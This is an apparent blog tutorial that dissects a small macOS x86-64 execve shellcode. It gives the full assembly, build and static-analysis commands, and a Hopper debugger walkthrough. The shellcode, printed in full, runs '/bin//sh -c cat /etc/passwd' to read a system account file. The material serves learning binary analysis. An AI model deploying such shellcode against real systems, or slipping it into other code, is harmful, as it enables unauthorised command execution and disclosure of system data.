Abstract
In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.
In the last article, Come taste some shellcode..., we introduced some basic binary analysis and we learned how to call a syscall with no arguments. In this article, we will analyse how to work with more complex arguments.
I will also introduce the Hopper disassembler (https://www.hopperapp.com/), one of the tools I use the most.
Execute a command
We start with the code:
; 43 bytes execute command
;
bits 64
global _main
_main:
push 59
pop rax ; eax = sys_execve
cdq ; edx = 0
bts eax, 25 ; eax = 0x0200003B
mov rbx, '/bin//sh'
push rdx ; 0
push rbx ; "/bin//sh"
push rsp
pop rdi ; rdi="/bin//sh", 0
; ---------
push rdx ; 0
push word '-c'
push rsp
pop rbx ; rbx="-c", 0
push rdx ; argv[3]=NULL
jmp l_cmd64
r_cmd64: ; argv[2]=cmd
push rbx ; argv[1]="-c"
push rdi ; argv[0]="/bin//sh"
push rsp
pop rsi ; rsi=argv
syscall
l_cmd64:
call r_cmd64
; put your command here followed by null terminator
db 'cat /etc/passwd',0
We assemble and link it:
gbiondo@tripleX Odzhan % nasm -f macho64 cmdRun.asm
gbiondo@tripleX Odzhan % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem -o cmdRun cmdRun.o
We can now run it. I will not show the output (why should I disclose the users on my machine, anyway?), but it runs perfectly on my macOS Monterey.
A bit of static analysis
If you read this blog, the following commands should not be new to you. If not, you may want to read the previous articles :) or do some man around.
Getting information about the executable
gbiondo@tripleX Odzhan % file cmdRun
cmdRun: Mach-O 64-bit executable x86_64
No surprises here. Just compare the above with how we compiled the file.
Looking for C strings
There are none. In fact:
gbiondo@tripleX Odzhan % strings cmdRun
gbiondo@tripleX Odzhan %
Getting information about the sections
This is a very simple program, after all:
gbiondo@tripleX Odzhan % objdump -m --section-headers cmdRun
Sections:
Idx Name Size VMA Type
0 __text 0000003b 0000000100003f7d TEXT
1 __unwind_info 00000048 0000000100003fb8 DATA
Getting the symbol table
No big hint is given by the symbol table:
gbiondo@tripleX Odzhan % objdump -m --syms cmdRun
cmdRun:
SYMBOL TABLE:
0000000100003f9d l F __TEXT,__text r_cmd64
0000000100000000 g *ABS* __mh_execute_header
0000000100003f7d g F __TEXT,__text _main
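The numbers in the section headers and in the symbol table can be cross-checked against the source listing. The following is a minimal Python sketch, not part of the original shellcode: the per-instruction sizes are my assumption about the encodings NASM chooses for this listing, and the names INSTRUCTIONS, COMMAND, MAIN_VMA and label_offset are hypothetical helpers introduced only for this check.

```python
# Instruction sizes in bytes. ASSUMPTION: these are the usual x86-64
# encodings for the listing above; verify them with a disassembler
# on your own build.
INSTRUCTIONS = [
    ("push 59", 2),
    ("pop rax", 1),
    ("cdq", 1),
    ("bts eax, 25", 4),
    ("mov rbx, '/bin//sh'", 10),
    ("push rdx", 1),
    ("push rbx", 1),
    ("push rsp", 1),
    ("pop rdi", 1),
    ("push rdx", 1),
    ("push word '-c'", 4),
    ("push rsp", 1),
    ("pop rbx", 1),
    ("push rdx", 1),
    ("jmp l_cmd64", 2),
    ("r_cmd64: push rbx", 1),
    ("push rdi", 1),
    ("push rsp", 1),
    ("pop rsi", 1),
    ("syscall", 2),
    ("l_cmd64: call r_cmd64", 5),
]

COMMAND = b"cat /etc/passwd\x00"   # the db line at the end of the listing
MAIN_VMA = 0x100003F7D             # address of _main in the symbol table


def label_offset(label):
    """Return the byte offset from _main of the instruction carrying `label`."""
    offset = 0
    for text, size in INSTRUCTIONS:
        if text.startswith(label + ":"):
            return offset
        offset += size
    raise KeyError(label)


code_size = sum(size for _, size in INSTRUCTIONS)   # code only, no command string
text_size = code_size + len(COMMAND)                # what ends up in __text
r_cmd64_vma = MAIN_VMA + label_offset("r_cmd64")

print(code_size, hex(text_size), hex(r_cmd64_vma))
```

Under these assumptions the code alone accounts for the "43 bytes" of the header comment, the command string adds 16 more, and the total matches the 0x3b size reported for __text.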
Dynamic Analysis
Time for some debugging. This time we are using Hopper. This is not supposed to be a tutorial for Hopper (which can be found here: https://www.hopperapp.com/tutorial.html or under the Help menu of the application).
Let's remember what an execve-based shellcode must do:
- The first parameter must be stored in RDI. It is a pointer to a string holding the path of the executable.
- The second parameter must be stored in RSI. It is a pointer to a null-terminated array of strings containing the parameters to the command.
- The third parameter must be stored in RDX. It is a pointer to a null-terminated array of strings containing the environment variables.
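To make the target concrete, here is a small Python sketch of the three values the shellcode has to assemble before the syscall. It only builds the values and never executes anything; build_execve_args is a hypothetical helper name, and the mapping to registers is written in the comments.

```python
def build_execve_args(command):
    """Return (path, argv, envp) as this shellcode sets them up.

    Nothing is executed here: the function only mirrors the data layout.
    """
    path = "/bin//sh"              # first parameter, pointed to by RDI
    argv = [path, "-c", command]   # second parameter, pointed to by RSI
                                   # (in memory the array ends with a NULL pointer)
    envp = None                    # third parameter, RDX: the shellcode leaves it
                                   # at 0 (set by cdq and never changed afterwards)
    return path, argv, envp


path, argv, envp = build_execve_args("cat /etc/passwd")
print(path, argv, envp)
```

The doubled slash in /bin//sh is harmless for path resolution and pads the path to exactly 8 bytes, so it fits in a single 64-bit register.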
I am choosing Select Debugger from the Debug menu, and I opt for the local debugger. I am then presented with this window:
Observe the "Controls" box. There are 10 buttons. From left to right, these are:
- Continue execution
- Pause execution
- Step into
- Step out
- Step over
- Continue until current position
- Continue until basic block end
- Trace procedure
- Stop execution
- Toggle breakpoint
Below, a Tab View controller can be seen. It contains four main areas we are interested in:
- General purpose registers (GPR)
- Memory
- Debugger Console
- Application Output
I also set a breakpoint at the beginning of the main routine:
It's worthwhile to set a few breakpoints. At the beginning, we'll stop at every single instruction.
If we set a breakpoint on the very next instruction and hit Continue execution twice, we'll notice how the contents of the RAX register change (59 has been pushed to the stack and then popped into RAX).
Before:
After:
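If we continue, there's the CDQ instruction. It copies the sign bit of EAX into every bit of EDX; since EAX holds 59, which is positive, EDX becomes 0, and writing a 32-bit register also clears the upper half of RDX, so RDX=0 (see below).
Then bit 25 of EAX (counting from 0) is set to 1, giving 0x0200003B - this technique should already be familiar to the reader, so we won't illustrate it again.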
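The effect of these first four instructions on the registers can be modelled in a few lines. This is a minimal Python sketch of the arithmetic only; cdq and bts here are hypothetical helper functions named after the instructions they imitate, and flags are ignored.

```python
MASK32 = 0xFFFFFFFF


def cdq(eax):
    """Return EDX after CDQ: every bit is a copy of EAX's sign bit (bit 31)."""
    return MASK32 if eax & 0x80000000 else 0


def bts(value, bit):
    """Return `value` with the given bit set (the carry-flag side effect is ignored)."""
    return value | (1 << bit)


eax = 59            # push 59 / pop rax
edx = cdq(eax)      # cdq
eax = bts(eax, 25)  # bts eax, 25

print(hex(eax), edx)
```

The final value of EAX is the one announced in the listing's own comment, 0x0200003B.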
With the next instruction we can see something I love about Hopper. The instruction is illustrated below:
or, in plain text
movabs rbx, 0x68732f2f6e69622f
If we right-click on the 0x68732f2f6e69622f operand and select "Characters", Hopper converts it into something more human readable (in this case, /bin//sh). Good job, Hopper!
Once the instruction has executed, RBX is updated accordingly.
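What Hopper's "Characters" view does can be reproduced by hand: the immediate is just the eight ASCII bytes of the string read as a little-endian integer. A minimal Python sketch follows; imm64_to_text and text_to_imm64 are hypothetical helper names.

```python
def imm64_to_text(value):
    """Decode a 64-bit immediate into the 8 ASCII characters it stores in memory."""
    return value.to_bytes(8, "little").decode("ascii")


def text_to_imm64(text):
    """Encode up to 8 ASCII characters as the immediate that stores them."""
    return int.from_bytes(text.encode("ascii"), "little")


print(imm64_to_text(0x68732F2F6E69622F))
print(hex(text_to_imm64("/bin//sh")))
```

The lowest byte of the immediate (0x2f, the first slash) is stored at the lowest address, which is why the string appears reversed when the operand is read as a hexadecimal number.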
We hit Continue, and first the contents of RDX (a zeroed register) and then the contents of RBX (0x68732F2F6E69622F, the string /bin//sh) are pushed onto the stack. After this, the stack holds a null-terminated string containing /bin//sh.
In fact, before running the instructions, RSP, the stack pointer, points to 00007FF7BFEFFA68. The contents of the memory can be seen in the third line of the memory dump of the image below:
Then RDX is pushed and RSP updated accordingly, so RSP becomes 00007FF7BFEFFA60. The stack is updated, see the second line of the memory pane:
Finally RBX is pushed and we have:
- RSP contains 00007FF7BFEFFA58
- RBX contains 68732F2F6E69622F
- the stack is represented below
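The two pushes can be replayed with a toy stack model. This is a minimal Python sketch under the assumption that RSP starts at the value seen in this debugging session (it will differ on other runs); the Stack class is a hypothetical helper, not a debugger API.

```python
class Stack:
    """Toy model of a downward-growing stack backed by a byte-addressed dict."""

    def __init__(self, rsp):
        self.rsp = rsp
        self.mem = {}

    def push64(self, value):
        """Decrement RSP by 8, then store the value in little-endian order."""
        self.rsp -= 8
        for i, byte in enumerate(value.to_bytes(8, "little")):
            self.mem[self.rsp + i] = byte

    def read(self, addr, count):
        """Return `count` bytes starting at `addr` (unwritten memory reads as 0)."""
        return bytes(self.mem.get(addr + i, 0) for i in range(count))


stack = Stack(0x7FF7BFEFFA68)         # RSP before the two pushes (from this session)
stack.push64(0)                       # push rdx
rsp_after_rdx = stack.rsp
stack.push64(0x68732F2F6E69622F)      # push rbx
rsp_after_rbx = stack.rsp

print(hex(rsp_after_rdx), hex(rsp_after_rbx), stack.read(stack.rsp, 9))
```

Reading nine bytes from the new top of the stack yields the eight characters of the path followed by the first zero byte of the previously pushed RDX, which is what makes the string null-terminated.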
Then rsp is pushed and the value is immediately popped into RDI, so RDI now holds the address of the /bin//sh string (00007FF7BFEFFA58). Let's have a look at what we have after the instruction pop rdi is executed:
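Now the contents of RDX are pushed onto the stack, and then we also push the 16-bit constant 0x632d, which is the string -c (0x2d is '-' and 0x63 is 'c', stored in little-endian order). Being a word push, it lowers RSP by 2 bytes only; the zero pushed just before it acts as the string terminator. See below: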
The stack looks as follows:
The next instructions push the contents of rsp onto the stack and pop the value into rbx, which now points to the -c string:
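The address that ends up in rbx can be worked out by hand. The following Python sketch only does the pointer arithmetic; the starting value of RSP is the one observed earlier in this session after /bin//sh was pushed (push rsp / pop rdi leaves RSP unchanged), so the resulting address is specific to this run.

```python
rsp = 0x7FF7BFEFFA58   # RSP once "/bin//sh" is on the stack (value from this session)

rsp -= 8               # push rdx: eight zero bytes, the terminator of "-c"
rsp -= 2               # push word '-c': a 16-bit push moves RSP by 2 only

dash_c = (0x632D).to_bytes(2, "little")   # bytes as they sit in memory
rbx = rsp                                 # push rsp / pop rbx

print(dash_c, hex(rbx))
```

Note that after the word push RSP is no longer 8-byte aligned; the shellcode does not care, since it only needs valid pointers for the syscall.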
Finally, the value of rdx, which is null, is pushed onto the stack: it will become the NULL terminator of argv. Now there's a noticeable difference between the original code, with two labels (r_cmd64 and l_cmd64), and the code that has been assembled, linked and then disassembled. Only r_cmd64 is present (it is also the only one of the two listed in the symbol table), and the instruction jmp r_cmd64+6 is used instead. When we hit Continue, the jump sends the control flow to 0x0000000100003FA3, which contains call r_cmd64. Why jump back and forth? Because call pushes its return address, that is, the address of whatever follows it in memory, and what follows here is the command string. This way we place the pointer to the command string on the stack without ever knowing its absolute address. Below there's the 'before'...
...and the 'after':
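The addresses involved in this jump-and-call trick can be checked against the symbol table and section headers shown earlier. A minimal Python sketch of the arithmetic follows; the 5-byte size of the call is my assumption about its encoding (one opcode byte plus a 32-bit displacement), and the constant names are hypothetical.

```python
R_CMD64 = 0x100003F9D          # from the symbol table
L_CMD64 = R_CMD64 + 6          # target of "jmp r_cmd64+6" in the disassembly
CALL_SIZE = 5                  # ASSUMPTION: near call, opcode E8 + rel32

# call pushes the address of the byte that follows it: the command string.
return_address = L_CMD64 + CALL_SIZE

COMMAND = b"cat /etc/passwd\x00"
TEXT_END = 0x100003F7D + 0x3B  # __text VMA + size, from the section headers

print(hex(L_CMD64), hex(return_address), hex(return_address + len(COMMAND)))
```

Under that assumption the string starts right after the call and ends exactly where __text ends, which is also where __unwind_info begins in the section listing.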
Now we can push rsp and pop the value into rsi, so that RSI points to the argv array that has just been built on the stack:
and
Finally the syscall is invoked, and the execution of the shellcode terminates.
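To recap the whole walkthrough, the stack construction can be replayed end to end and then read back the way the kernel would read argv. This is a minimal Python sketch, not an emulator: Machine and run are hypothetical helpers, the initial RSP is the one from this session, and the command address assumes the string sits right after the call instruction.

```python
class Machine:
    """Toy memory + stack pointer, just enough to replay the pushes."""

    def __init__(self, rsp, image):
        self.rsp = rsp
        self.mem = dict(image)   # address -> byte

    def push(self, value, size=8):
        """Decrement RSP by `size` and store `value` in little-endian order."""
        self.rsp -= size
        for i, byte in enumerate(value.to_bytes(size, "little")):
            self.mem[self.rsp + i] = byte

    def qword(self, addr):
        """Read a 64-bit little-endian value (unwritten memory reads as 0)."""
        raw = bytes(self.mem.get(addr + i, 0) for i in range(8))
        return int.from_bytes(raw, "little")

    def cstring(self, addr):
        """Read a NUL-terminated ASCII string."""
        out = bytearray()
        while self.mem.get(addr, 0) != 0:
            out.append(self.mem[addr])
            addr += 1
        return out.decode("ascii")


def run(command=b"cat /etc/passwd\x00",
        command_addr=0x100003FA8,       # ASSUMPTION: byte right after the call
        rsp=0x7FF7BFEFFA68):            # initial RSP seen in this session
    m = Machine(rsp, {command_addr + i: b for i, b in enumerate(command)})
    m.push(0)                           # push rdx
    m.push(0x68732F2F6E69622F)          # push rbx ("/bin//sh")
    rdi = m.rsp                         # push rsp / pop rdi
    m.push(0)                           # push rdx
    m.push(0x632D, size=2)              # push word '-c'
    rbx = m.rsp                         # push rsp / pop rbx
    m.push(0)                           # argv[3] = NULL
    m.push(command_addr)                # call r_cmd64 pushes argv[2]
    m.push(rbx)                         # argv[1]
    m.push(rdi)                         # argv[0]
    rsi = m.rsp                         # push rsp / pop rsi

    argv = []
    pointer = m.qword(rsi)
    while pointer != 0:                 # walk the array up to the NULL entry
        argv.append(m.cstring(pointer))
        rsi += 8
        pointer = m.qword(rsi)
    return m.cstring(rdi), argv


path, argv = run()
print(path, argv)
```

Walking the array from RSI gives back the three strings in order, which is the argument layout execve expects.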
Conclusions
As strange as it may seem, I find it easier to work with lldb - but I am an old guy :)
Hopper has powerful features anyway - I am using it for many other purposes (like changing memory contents on the fly).
We have shown how to approach some static and dynamic binary analysis for this kind of program.
Finally: we start to understand assembly, but always having no talent and being proud of having none!